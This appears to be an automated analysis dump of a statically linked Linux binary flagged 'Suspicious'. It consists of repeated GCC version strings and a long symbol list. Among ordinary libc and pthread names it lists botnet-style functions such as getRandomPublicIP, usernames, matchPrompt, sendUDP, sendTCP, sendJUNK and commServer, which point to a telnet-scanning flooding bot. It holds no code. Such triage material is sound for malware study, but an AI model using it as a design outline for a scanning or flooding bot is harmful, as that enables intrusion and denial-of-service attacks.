(GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, 
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, 
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2
Identified
242
Suspicious
True
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , frame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i386/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , trigger, , c, , Q, , i.4252, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , errno.c, , thread_self, , manager.c, , terminated_children, , main_thread_exiting, , pthread_kill_all_threads, , pthread_start_thread, , pthread_start_thread_event, , pthread_free, , restart, , pthread_reap_children, , pthread_threads_counter, , ptfork.c, , pthread_insert_list, , pthread_call_handlers, , pthread_atfork_lock, , pthread_atfork_prepare, , pthread_atfork_child, , pthread_atfork_parent, , semaphore.c, , enqueue, , remove_from_queue, , __pthread_set_own_extricate_if, , thread_self, , new_sem_extricate_func, , suspend, , signals.c, , pthread_null_sighandler, , thread_self, , pthread_sighandler_rt, , sighandler, , pthread_sighandler, , spinlock.c, , wait_node_dequeue, , __pthread_acquire, , wait_node_free, , wait_node_free_list_spinlock, , wait_node_free_list, , restart, , thread_self, , suspend, , wrapsyscall.c, , pthread.c, , current_rtmin, , current_rtmax, , pthread_handle_sigdebug, , current_level, , suspend, , thread_self, , pthread_onexit_process, , pthread_initialize, , pthread_handle_sigrestart, , pthread_handle_sigcancel, , __libc_multiple_threads_ptr, , attr.c, , cancel.c, , thread_self, , condvar.c, , enqueue, , remove_from_queue, , __pthread_set_own_extricate_if, , restart, , thread_self, , cond_extricate_func, , suspend, , events.c, , join.c, , __pthread_set_own_extricate_if, , thread_self, , join_extricate_func, , suspend, , lockfile.c, , mutex.c, , __pthread_trylock, , 
__pthread_alt_trylock, , once_masterlock, , once_finished, , fork_generation, , thread_self, , pthread_once_cancelhandler, , ptlongjmp.c, , pthread_cleanup_upto, , specific.c, , thread_self, , pthread_keys, , pthread_keys_mutex, , sigaction.c, , __restore_rt, , __restore, , libc/sysdeps/linux/i386/clone.S, , __error, , libc/sysdeps/linux/i386/setjmp.S, , libc/sysdeps/linux/i386/mmap.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , __syscall_rt_sigaction.c, , _exit.c, , chdir.c, , close.c, , dup2.c, , fork.c, , fsync.c, , getdtablesize.c, , geteuid.c, , getpagesize.c, , getpid.c, , getppid.c, , getrlimit.c, , gettimeofday.c, , kill.c, , llseek.c, , longjmp.c, , lseek.c, , msync.c, , munmap.c, , nanosleep.c, , open.c, , open64.c, , pause.c, , pipe.c, , poll.c, , pread_write.c, , __fake_pread_write64, , __fake_pread_write, , read.c, , sched_get_priority_max.c, , sched_get_priority_min.c, , sched_getparam.c, , sched_getscheduler.c, , sched_setscheduler.c, , sched_yield.c, , select.c, , setrlimit.c, , setsid.c, , sigprocmask.c, , sigsuspend.c, , time.c, , wait.c, , wait4.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_toupper.c, , errno.c, , puts.c, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fixed_buffers, , _wcommit.c, , fputc_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strchr.c, , strcpy.c, , strlen.c, , strncpy.c, , strstr.c, , strtok.c, , next_start.1278, , isatty.c, , tcdrain.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.c, , accept.c, , connect.c, , getsockopt.c, , recv.c, , recvfrom.c, , recvmsg.c, , send.c, , sendmsg.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigdelset.c, , sigempty.c, , sigfillset.c, , sigismem.c, , sigjmp.c, , signal.c, , sigsetops.c, , malloc.c, , __malloc_largebin_index, , calloc.c, , free.c, , __malloc_trim, , abort.c, , mylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state, , 
randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _stdlib_strto_l.c, , exit.c, , on_exit.c, , daemon.c, , execl.c, , sleep.c, , sysconf.c, , libc_pthread_init.c, , __uClibc_main.c, , __pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_done_that.3001, , rpc_thread.c, , rpc_thread_multi, , __libc_tsd_RPC_VARS_mem, , once.5915, , __syscall_error.c, , libc/sysdeps/linux/i386/__longjmp.S, , libc/sysdeps/linux/i386/vfork.S, , __socketcall.c, , clock_getres.c, , execve.c, , getegid.c, , getgid.c, , getuid.c, , ioctl.c, , sbrk.c, , _WRITE.c, , _fwrite.c, , _trans2w.c, , _uintmaxtostr.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , clnt_simple.c, , clnt_udp.c, , clntudp_geterr, , clntudp_freeres, , clntudp_abort, , clntudp_control, , udp_ops, , clntudp_destroy, , clntudp_call, , create_xid.c, , mylock, , is_initialized, , __rpc_lrand48_data, , pm_getport.c, , timeout, , tottimeout, , pmap_prot.c, , rpc_commondata.c, , rpc_prot.c, , reply_dscrm, , svc.c, , svc_find, , svc_auth.c, , svcauthsw, , _svcauth_null, , svc_authux.c, , xdr.c, , crud.3487, , xdr_zero, , xdr_mem.c, , xdrmem_ops, , xdrmem_destroy, , xdrmem_getpos, , xdrmem_setpos, , xdrmem_inline, , xdrmem_putint32, , xdrmem_getint32, , xdrmem_putlong, , xdrmem_getlong, , xdrmem_putbytes, , xdrmem_getbytes, , inet_aton.c, , gethostbyname_r.c, , realloc.c, , lrand48_r.c, , nrand48_r.c, , srand48_r.c, , __exit_handler.c, , dl-support.c, , brk.c, , cmsg_nxthdr.c, , mremap.c, , fseeko.c, , printf.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_ranges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs.c, , memmove.c, , strcmp.c, , strnlen.c, , memcmp.c, , 
memcmp_bytes, , rawmemchr.c, , strspn.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1330, , _string_syserrmsgs.c, , ffs.c, , auth_none.c, , authnone_verf, , authnone_validate, , authnone_refresh, , authnone_destroy, , authnone_marshal, , ops, , authunix_prot.c, , bindresvport.c, , port.2516, , pmap_clnt.c, , __get_myaddress, , timeout, , tottimeout, , rpc_dtablesize.c, , size.4051, , xdr_array.c, , dnslookup.c, , mylock, , static_ns, , static_id, , opennameservers.c, , get_hosts_byname_r.c, , bind.c, , drand48-iter.c, , __h_errno_location.c, , wcrtomb.c, , wcsrtombs.c, , wcsnrtombs.c, , fclose.c, , fopen.c, , perror.c, , fprintf.c, , _fopen.c, , _load_inttype.c, , _store_inttype.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fgets.c, , fflush_unlocked.c, , fgets_unlocked.c, , strncat.c, , strdup.c, , clnt_perror.c, , rpc_errlist, , rpc_errstr, , free_mem, , _buf, , auth_errlist, , auth_errstr, , ntop.c, , inet_pton4, , xdigits.3285, , inet_ntop4, , encodeh.c, , decodeh.c, , encodeq.c, , lengthq.c, , decodea.c, , read_etc_hosts_r.c, , tolower.c, , __C_ctype_tolower.c, , sprintf.c, , vsnprintf.c, , fgetc_unlocked.c, , strcasecmp.c, , encoded.c, , decoded.c, , lengthd.c, , _READ.c, , _rfill.c, , _trans2r.c, , __fini_array_end, , __fini_array_start, , __init_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_array_start, , __preinit_array_start, , __read_etc_hosts_r, , longjmp, , __libc_tcdrain, , __linuxthreads_pthread_threads_max, , __GI_pthread_attr_getdetachstate, , __GI_execve, , __libc_sigaction, , __libc_pread, , strcpy, , __GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , xdr_longlong_t, , bcmp, , __GI_memchr, , __GI_pthread_attr_setdetachstate, , __GI___glibc_strerror_r, , pthread_mutex_timedlock, , waitpid, , __longjmp, , __libc_fsync, , __open_nameservers, , __GI_fopen, , xprt_register, , getrlimit, , ioctl, , pause, , pthread_cond_signal, , _stdio_openlist_use_count, , __pthread_mutexattr_destroy, , 
__GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ctype_toupper_data, , __GI_xdrmem_create, , __GI_time, , getgid, , __pthread_exit_code, , printf, , sysconf, , stdout, , random, , __GI_strdup, , __GI_getpagesize, , lrand48_r, , getdtablesize, , __GI_h_errno, , __length_question, , __GI___ctype_toupper, , __GI_strcasecmp, , __pthread_restart_new, , __GI_tolower, , pthread_mutexattr_gettype, , putc_unlocked, , pthread_attr_destroy, , recv, , connect, , __linuxthreads_initial_report_events, , __encode_question, , svcerr_auth, , __GI___uClibc_fini, , numpids, , __encode_header, , pthread_attr_getstacksize, , __GI_strncat, , __pthread_once, , pthread_create, , sigemptyset, , __pthread_mutex_lock, , pthread_getspecific, , __new_sem_destroy, , initConnection, , __sigdelset, , __GI_clock_getres, , __GI_pthread_attr_init, , __GI_svc_register, , __pthread_find_self, , __uClibc_fini, , memrchr, , geteuid, , __rpc_thread_svc_cleanup, , inet_pton, , __GI_vsnprintf, , pthread_attr_init, , __GI_pthread_setcanceltype, , __GI_setsid, , pthread_mutexattr_getkind_np, , __GI_sigsuspend, , memmove, , sendTCP, , pthread_exit, , __bsd_signal, , sem_timedwait, , __GI_strpbrk, , pmap_set, , __stdio_trans2r_o, , __GI_setsockopt, , munmap, , __libc_stack_end, , __pthread_manager_thread_bos, , sched_getparam, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , _longjmp, , __exit_function_table, , __GI_xdr_pmap, , pthread_condattr_setpshared, , xdrmem_create, , __libc_fcntl, , atol, , _h_errno, , xdr_des_block, , __new_sem_init, , getRandomPublicIP, , xdr_opaque_auth, , getc_unlocked, , clnt_spcreateerror, , __ctype_b, , __pthread_manager_event, , __GI_random_r, , __fresetlockfiles, , usernames, , clnt_perrno, , pwrite64, , __GI___longjmp, , __pthread_mutexattr_settype, , errno, , getegid, , __GI_pthread_attr_getschedparam, , __linuxthreads_create_event, , __GI_clnt_sperror, , __GI_sbrk, , zprintf, , __libc_accept, , __GI___uClibc_init, , _create_xid, , __exit_handler, 
, execve, , __libc_current_sigrtmax, , __GI_pthread_condattr_destroy, , __libc_pwrite64, , pthread_condattr_init, , getpagesize, , getpid, , pthread_attr_getstackaddr, , xdr_u_hyper, , __pthread_suspend, , setstate_r, , __GI_lseek64, , fgets, , getHost, , __libc_getpid, , wildString, , pthread_key_delete, , __GI_pthread_attr_setschedparam, , __xpg_strerror_r, , __GI___rpc_thread_svc_fdset, , _pthread_cleanup_pop, , fcntl64, , __pthread_lock, , memcpy, , __GI_svc_getreq, , pthread_cancel, , makeRandomStr, , pmap_getport, , getRandomIP, , __GI_fputs_unlocked, , execl, , __pthread_mutexattr_setpshared, , __GI_fgets, , __pthread_initial_thread_bos, , svc_sendreply, , perror, , pthread_mutexattr_destroy, , _rpc_dtablesize, , __pthread_reset_main_thread, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , __pthread_do_exit, , pthread_equal, , _ppfs_init, , __GI_memcmp, , puts, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , __libc_current_sigrtmin, , __pthread_sig_debug, , sem_destroy, , __GI__seterr_reply, , tolower, , getuid, , __GI_xdr_string, , system, , __open_etc_hosts, , __rpc_thread_svc_max_pollfd, , __GI_xprt_register, , __pthread_cleanup_push_defer, , malloc, , isatty, , __GI_pthread_cond_timedwait, , siglongjmp, , pthread_attr_getscope, , __GI_pmap_unset, , sleep, , __GI_atol, , sched_setscheduler, , __new_sem_post, , __pthread_initialize_manager, , vsnprintf, , __dns_lookup, , __GI_read, , recvfrom, , sem_wait, , xdr_bytes, , svcerr_decode, , tcdrain, , __C_ctype_tolower, , pthread_attr_getguardsize, , random_r, , __libc_longjmp, , __dso_handle, , sem_post, , sched_getscheduler, , __new_exitfn, , clock_getres, , pthread_testcancel, , __pthread_manager_sighandler, , __libc_pthread_init, , gethostbyname_r, , __pthread_attr_getstackaddr, , tcpcsum, , __linuxthreads_death_event, , __linuxthreads_version, , fdpclose, , __GI_pthread_attr_destroy, , socket, , 
__GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , __GI_accept, , clnt_perror, , __pthread_attr_setstacksize, , isspace, , pthread_attr_getinheritsched, , __stdio_seek, , __linuxthreads_pthread_keys_max, , pthread_kill_other_threads_np, , mempcpy, , __GI_strcoll, , __GI_write, , __pthread_mutexattr_gettype, , xdr_void, , sem_unlink, , __ctype_toupper, , __libc_pwrite, , __libc_read, , xdr_pmap, , svcerr_progvers, , __GI_xdr_accepted_reply, , _string_syserrmsgs, , svcerr_noproc, , __pthread_kill_other_threads_np, , __GI_open, , __GI_strchr, , __searchdomain, , __pthread_initialize, , __GI_xdr_rejected_reply, , __pthread_mutexattr_setkind_np, , lseek, , __GI_clnt_perror, , sigaddset, , __linuxthreads_pthread_key_2ndlevel_size, , __GI_tcgetattr, , __environ, , mmap, , xdr_vector, , __GI_clntudp_create, , __pthread_alt_unlock, , svc_getreq_common, , wcsnrtombs, , pthread_detach, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , svc_getreq, , __fgetc_unlocked, , __GI_clnt_spcreateerror, , abort, , nrand48_r, , xprt_unregister, , pthread_attr_getschedpolicy, , __sigjmp_save, , __libc_drand48_data, , __pthread_handles, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __libc_tsd_RPC_VARS_data, , __GI_getgid, , srandom_r, , __GI_fputs, , xdr_char, , _init, , __GI_setrlimit, , clnt_pcreateerror, , __GI_inet_ntoa_r, , __GI_setstate_r, , pthread_attr_setstackaddr, , parseHex, , strtol, , __sigsetjmp, , pipe, , __libc_lseek64, , __GI_pthread_getschedparam, , _svcauth_unix, , strnlen, , rawmemchr, , __GI_mempcpy, , accept, , __libc_allocate_rtsig, , __malloc_state, , pthread_getschedparam, , __GI___C_ctype_b_data, , __libc_pread64, , __GI_xdr_replymsg, , __GI_lrand48_r, , __sigaddset, , __GI_xdr_authunix_parms, , pthread_setcancelstate, , xdr_union, , __pthread_functions, , nanosleep, , __GI_send, , __pthread_wait_for_restart_signal, , xdr_enum, , h_errno, , calloc, , __GI_svcerr_auth, , xdr_bool, , 
__pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , setrlimit, , csum, , __GI_xdr_long, , __exit_cleanup, , xdr_wrapstring, , xdr_rejected_reply, , __GI___rpc_thread_createerr, , __GI_execl, , __GI_srandom_r, , pthread_condattr_destroy, , __GI___ctype_tolower, , pthread_attr_setscope, , write, , __rpc_thread_variables, , environ, , __GI_close, , xdr_free, , xdr_netobj, , fprintf, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , __pthread_destroy_specifics, , ffs, , svc_register, , xdr_long, , pthread_mutexattr_setkind_np, , __GI_svcerr_decode, , __GI_brk, , bind, , _svcauth_short, , __GI_nanosleep, , __GI_strtok, , svcerr_systemerr, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , __pthread_nonstandard_stacks, , __GI_clntudp_bufcreate, , __GI___libc_open64, , pthread_cond_broadcast, , pthread_once, , __pthread_once_fork_child, , ourIP, , chdir, , pthread_attr_setinheritsched, , __pthread_alt_lock, , pmap_unset, , __pthread_manager_adjust_prio, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __pthread_manager_thread, , __pthread_setconcurrency, , setsockopt, , xdr_short, , bsd_signal, , fseek, , mremap, , pthread_setschedparam, , __GI_kill, , __GI_strcmp, , svc_getreqset, , __GI_memmove, , setstate, , __decode_dotted, , __GI_pthread_cond_broadcast, , __pthread_perform_cleanup, , __stdio_READ, , pthread_key_create, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , svc_getreq_poll, , __stdin, , stdin, , __GI_clnt_sperrno, , __new_sem_wait, , wait, , xdr_accepted_reply, , __GI_isatty, , __libc_open64, , pthread_setconcurrency, , sem_init, , svcerr_weakauth, , xdr_authunix_parms, , __pthread_mutex_destroy, , __pthread_mutexattr_getkind_np, , __pthread_handles_num, , _start, , sem_close, , __deregister_frame_info_bases, , __GI_xdr_opaque_auth, , strstr, , __GI_ioctl, , xdr_u_longlong_t, , init_rand, , rand, , pthread_kill, , signal, , read, , 
__GI_xdr_int, , __pthread_manager_request, , __pthread_internal_tsd_get, , __decode_header, , pread64, , __linuxthreads_pthread_sizeof_descr, , pthread_attr_setstacksize, , getCores, , __GI___h_errno_location, , xdr_u_char, , __GI_memcpy, , sendmsg, , strcoll, , clntudp_create, , __GI_xdr_callhdr, , wcsrtombs, , _stdio_user_locking, , __pthread_internal_tsd_address, , __cmsg_nxthdr, , __GI_svcerr_noprog, , __GI_sigdelset, , strncpy, , strcasecmp, , htonl, , sendto, , __exit_count, , xdr_u_long, , __C_ctype_toupper, , __GI_open64, , StartTheLelz, , sched_get_priority_max, , __GI___C_ctype_b, , xdr_replymsg, , pthread_sigmask, , realloc, , on_exit, , __libc_siglongjmp, , __GI_gethostbyname_r, , __GI_pthread_cond_signal, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __pthread_attr_setstackaddr, , __GI___C_ctype_tolower, , __GI_recvfrom, , pthread_cond_init, , __GI_getrlimit, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __GI___fputc_unlocked, , sigfillset, , memcmp, , svcerr_noprog, , sched_get_priority_min, , __stdio_adjust_position, , xdr_opaque, , malloc_trim, , _vfprintf_internal, , __GI_poll, , __GI_nrand48_r, , fork, , __pthread_restart, , __GI_pthread_attr_setschedpolicy, , pthread_mutexattr_getpshared, , __GI_pthread_attr_setinheritsched, , __stdio_rfill, , strncat, , __GI_pthread_attr_getscope, , __GI_bindresvport, , gotIP, , __libc_pause, , sem_trywait, , __GI_sleep, , sigaction, , _dl_phdr, , __pthread_mutexattr_init, , __GI_svc_sendreply, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , xdr_callhdr, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __GI_mremap, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_svcerr_progvers, , __GI_fork, , strdup, , __libc_close, , __pthread_internal_tsd_set, , __GI_getpid, , inet_aton, , pthread_condattr_getpshared, , index, , _pthread_cleanup_push_defer, , 
processCmd, , __sigismember, , gettimeofday, , fopen, , __bss_start, , __GI_pthread_self, , __libc_open, , memset, , __GI_socket, , main, , __GI___libc_lseek, , __glibc_strerror_r, , __GI_sigfillset, , __rpc_thread_clnt_cleanup, , listFork, , __GI___C_ctype_tolower_data, , __GI_xdr_union, , __stdio_fwrite, , negotiate, , srand, , __rpc_thread_svc_pollfd, , initstate, , fclose, , __GI_pthread_attr_setscope, , __syscall_rt_sigaction, , open64, , xdr_string, , ntohs, , pthread_mutexattr_settype, , inet_ntoa, , sendUDP, , getppid, , tcgetattr, , __C_ctype_tolower_data, , __libc_recvfrom, , time, , __pthread_threads_events, , __libc_system, , __GI_abort, , pthread_mutexattr_setpshared, , poll, , __GI_pthread_cond_wait, , __GI_pthread_cond_init, , __GI_pthread_cond_destroy, , __GI_xdr_u_short, , xdr_u_int, , fdpopen, , __GI_fprintf, , pthread_attr_getdetachstate, , __pthread_last_event, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , __libc_recvmsg, , strcmp, , pthread_mutex_unlock, , callrpc, , __nameserver, , data_start, , _seterr_reply, , __rpc_thread_svc_fdset, , __GI_sysconf, , __pthread_manager_reader, , __pthread_initial_thread, , __h_errno_location, , __GI_putc_unlocked, , __GI___rpc_thread_svc_pollfd, , matchPrompt, , __C_ctype_b_data, , __GI_inet_pton, , _stdio_fopen, , __GI_xdr_u_hyper, , __GI_pthread_setschedparam, , _fini, , __GI_xdr_opaque, , __GI_chdir, , authnone_create, , __vfork, , __GI_mmap, , __GI_xdr_array, , sprintf, , __pthread_offsetof_descr, , __new_sem_trywait, , fdgets, , msync, , __get_pc_thunk_bx, , strerror_r, , __GI_ffs, , __GI_select, , __libc_waitpid, , __pthread_unlock, , __libc_multiple_threads, , sem_open, , __GI_xdr_bool, , __rpc_thread_destroy, , __GI_waitpid, , __GI_xdr_u_int, , __GI_vfprintf, , __GI_xdr_enum, , _stdio_term, , __decode_answer, , __GI_signal, , __pthread_attr_setguardsize, , stderr, , __pthread_exit_requested, , commServer, , __pthread_attr_getguardsize, , __pthread_manager_thread_tos, , 
__GI_pthread_exit, , vfork, , __C_ctype_b, , __pthread_once_fork_parent, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __GI_printf, , __libc_fork, , sigismember, , __atexit_lock, , scanPid, , __linuxthreads_reap_event, , fsync, , rand_cmwc, , __pthread_manager, , __libc_lseek, , __GI_xprt_unregister, , clnt_sperror, , __GI_pmap_set, , __pthread_getconcurrency, , __pthread_alt_timedlock, , __libc_fcntl64, , _pthread_cleanup_push, , pread, , pthread_self, , pthread_setcanceltype, , getsockopt, , __GI_fseeko64, , __pthread_once_fork_prepare, , pthread_mutexattr_init, , __libc_wait, , fflush_unlocked, , __stdio_wcommit, , __exit_slots, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , __GI_recvmsg, , __GI_pthread_attr_getschedpolicy, , __drand48_iterate, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_xdr_u_long, , __GI_strstr, , __searchdomains, , _end, , bindresvport, , __pthread_threads_max, , htons, , pthread_mutex_destroy, , svc_fdset, , __rpc_thread_createerr, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , pthread_mutex_lock, , __GI_svc_getreq_common, , __new_sem_getvalue, , __GI_connect, , __curbrk, , sem_getvalue, , __libc_poll, , pthread_cond_wait, , _dl_phnum, , __GI_pthread_equal, , _fpmaxtostr, , svc_unregister, , __errno_location, , __pthread_timedsuspend, , uppercase, , __GI_pmap_getport, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , pthread_attr_setguardsize, , __GI_geteuid, , __GI_sendmsg, , sigdelset, , inet_ntop, , brk, , pthread_mutex_trylock, , __GI_pthread_setcancelstate, , _null_auth, , pthread_atfork, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , __GI_perror, , __libc_sendmsg, , _errno, , _authenticate, , __GI_gettimeofday, , atoi, , _stdio_openlist_del_lock, , pthread_cond_destroy, , __GI_inet_aton, , pthread_attr_setschedpolicy, , 
__GI_svc_getreq_poll, , fgets_unlocked, , __pthread_mutexattr_getpshared, , __GI_bind, , _exit, , szprintf, , __pthread_timedsuspend_new, , __pthread_sig_cancel, , __GI_xdr_void, , __GI_lseek, , __pthread_sig_restart, , strspn, , __pthread_offsetof_pid, , __libc_recv, , __pthread_main_thread, , daemon, , pthread_mutex_init, , __pthread_cleanup_pop_restore, , __libc_creat, , __pthread_attr_getstacksize, , strlen, , __GI___cmsg_nxthdr, , lseek64, , open, , clone, , xdr_array, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __fork, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , __GI__authenticate, , strchr, , __GI_rawmemchr, , __GI_srand48_r, , fputs, , svc_max_pollfd, , __GI_raise, , pthread_attr_setschedparam, , __data_start, , __pthread_sizeof_handle, , __pthread_provide_wrappers, , setsid, , __GI_inet_addr, , __GI_svc_unregister, , __GI_pthread_condattr_init, , rpc_createerr, , __libc_msync, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , macAddress, , __pthread_threads_debug, , pthread_attr_setdetachstate, , recvmsg, , fputc_unlocked, , svc_pollfd, , readUntil, , __libc_sigsuspend, , __GI_xdr_hyper, , fcntl, , __GI_xdr_bytes, 